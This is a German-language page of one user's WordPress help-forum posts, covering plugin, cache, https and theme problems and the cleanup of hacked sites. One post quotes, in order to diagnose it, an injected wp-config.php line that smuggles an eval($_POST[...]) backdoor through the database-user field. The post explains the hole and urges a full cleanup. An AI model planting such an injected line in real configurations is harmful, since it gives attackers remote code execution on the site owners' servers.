Entweder Du machst selbst exakt das im o.g. Link beschriebene "weitere Vorgehen" oder Du lässt einen Fachmann ran, der das für Dich macht, poste eine entspr. Anfrage in der Jobbörse im Forum, dann bekommst Du sicher Angebote.
Beiträge von b3317133
-
-
@knutschimund hat sich vor 8 Wochen das letzte Mal hier angemeldet, wahrscheinlich kommt da kein Feedback mehr.
-
Ein (oder auch mehrere) klassische(r) Trojaner bzw. Backdoor.
Die zu klärende Frage ist, wie bzw. wodurch wird diese Datei generiert und wie erfolgen die Anpassungen in [FONT=Courier New]wp-config.php[/FONT]
Die Zeile mit [FONT=Courier New]define('DB_USER', 'c[COLOR=#ff0000]');eval($_POST['earvsqqsv']);//[/COLOR]');[/FONT] deutet auf eine Injection-Möglichkeit bei der Eingabe des Datenbankbenutzers hin, der rot markierte Bereich gehört da nicht hin und ermöglicht dann in der Folge das Ausführen von beliebigem externen PHP-Code.
Der ganze Server ist als kompromitiert zu betrachten.
-
Das Wichtigste wäre das Feststellen und Beseitigen der Sicherheitslücke, sonst passiert das immer wieder.
Das allgemeine Vorgehen bei einem Hack ist z.B. hier beschrieben.
Alternativ wende Dich an die Person, die den Website eingerichtet hat oder suche jemanden für eine Ursachensuche und Bereinigung z.B. über die Jobbörse hier im Forum.
-
Herausgefunden nach knapp 10 Minuten durch die Browser-Konsole und etwas Erfahrung mit gängigen WordPress- und anderen CMS- oder Server-Problemen...
..beim nächsten Mal einfach den Link posten, wenn man danach gefragt wird, dann geht vieles viel schneller.
-
Inzwischen erscheint ein neu installiertes WordPress ohne weitere Inhalte, das ursprüngliche Problem hat sich also offenbar erledigt bzw. ist nicht mehr relevant.
-
Verlinkte Bilder wie [plain]/wp-content/uploads/5.png[/plain] usw. existieren einfach nicht auf dem Server.
Wurden Ordner verschoben oder sonstige Änderungen gemacht?
Dass Du die Bilder in manchen Browsern (noch) sehen kannst, mag am jeweiligen Browser-Cache liegen.
Dazu ist ein Teil des Websites, z.B. der Adminbereich, offenbar für https eingerichtet, das Frontend aber nicht. Wie wurde das gemacht? Über Plugins? Falls ja, deaktiviere mal alle diesbzgl. Plugins.
Nach einem weiteren Test wird jetzt eine "1&1 Under Construction" Seite gezeigt, offenbar läuft da einiges schief. Ggf. erstmal mit dem Weiterbasteln abwarten, bis Du Deine Fragen hier klären kannst, sonst machen Hilfeversuche hier relativ wenig Sinn.
-
Wenn man dem oben verlinkten allgemeinen Vorgehen bei einem Hack folgt, gibt es danach keine "Schadcodes" mehr im gesamten System.
Mit dem Deaktivieren oder Entfernen eines Plugins alleine wäre es natürlich nicht getan.
-
Die Ergänzung des Links kommt möglicherweise durch das Spendenformular von Altruja, entferne das temporär oder wende Dich an die Person, die das Formular eingerichtet hat. Der Link befindet sich in einer Datei [plain]altruja.de/i/wzun[/plain]
Weiterhin läuft ein Pagespeed Plugin o.ä., deaktiviere auch das mal. Das erleichert das Nachvollziehen, was wann wo wie auf der Seite passiert.
-
@Raphael Der Teil "Überschrift mit dem Datum vor den Beiträgen des jeweiligen Tages" fehlte beim alten Jobbörse Aufruf. Hatte den Job damals erledigt und die aktuelle Anforderung im dafür erstellten Plugin jetzt über eine [FONT=Courier New]get_template_part_content-standard[/FONT] Action mit entspr. Logik ergänzt, [FONT=Courier New]get_template_part('content-standard')[/FONT] wird im genutzten Theme Hueman u.a. für die Blogansicht verwendet, ein Child-Theme gibt es derzeit nicht.
-
Das kommt etwas auf den o.g. Code an. Wenn es da alleine über eine [FONT=Courier New]pre_get_posts[/FONT] Action gelöst ist, braucht man noch Anpassungen in der sog. "Loop" Ausgabe für die Startseite über ein Child-Theme. Poste am besten eine enspr. Anfrage in der Jobbörse.
-
wo müsste ich denn ansetzen?
Im Code von hier.
-
Es läuft wieder alles ....
Also mich würde ja interessieren, wie der Fehler zustande kam und ob er wieder zustande kommen könnte, wenn das meine Seite wäre... -
Du solltest die Kategorienbox nach links auf die andere Seite unter den Editor ziehen können, dann wäre sie breiter. Die Höhe (Standard maximal 200px) könnte man in einem eigenen Plugin oder in der [FONT=Courier New]functions.php[/FONT] des Child-Themes o.ä. über eine [FONT=Courier New]admin_head[/FONT] Action überschreiben, ggf. ähnlich auch die Abstände zwischen den Kategorien oder die Textgrösse o.ä.
-
Für das Ersetzen von http auf https sollte man besser ein Plugin wie "Better Search Replace" nutzen, da diese bei serialisiert gespeicherten Daten z.B. in wp_options o.ä. die entspr. Feldlänge korrigieren, das fällt bei Anpassungen mit Texteditor o.ä. in der Regel unter den Tisch.
-
Es sind weiterhin Verweise auf den Testserver in den Seiten, z.B. auf /for-you/professional/ usw.
Woran das Admin-Rechte Problem liegt, lässt sich "von aussen" schwer sagen. Welche Plugins werden genutzt?
-
Der Screenshot des Impressums deutet darauf hin, dass das Plugin WPBakery Page Builder (früher auch Visual Composer genannt) nicht aktiv ist.
Was passiert, wenn Du die "Passwort vergessen?" Funktion aufder Loginseite nutzt?
-
Da es leider keinen Link zu Seite gibt, wo man das nachvollziehen könnte, kann man leider nur schwer weiterhelfen.
Deaktiviere der Reihe nach alle Plugins, leere jeweils dazwischen Deinen Browser Cache, nutze ein "Twenty XXX" Standard-Theme, bis Du die Ursache weiter eingegrenzt hast.
-
Für die WordPress App gibt es hier Support.
Ein ähnliches Problem mit Android wurde kürzlich hier beschrieben.
Du könntest versuchen, auf der Seite das Plugin "Classic Editor" zu installieren und zu aktivieren, evtl. hilft das (ungetestet, wir nutzen die Apps nicht).
-
Inwiefern würde das Layout negativ beeinflusst werden?
Probiere es einfach aus, Elementor ist ein eigener Editor, selbstgestricktes HTML ist dort nur innerhalb entspr. Elemente vorgesehen, eine komplette Bearbeitung nicht.
Evtl. hilf auch der Elementor Support, den Du mit "Pro" mitgekauft haben solltest, mit einer detaillierteren technischen Erklärung weiter.
Um herauszufinden, warum das Laden einer Seite zwei Minuten dauert, würde man z.B. mal in die Browser Konsole schauen, oder in Server Error Logs o.ä., das kann man von aussen schwer beurteilen. Hatte hier noch keine solch langsame Seite, mit weitaus weniger "starker" Anbindung.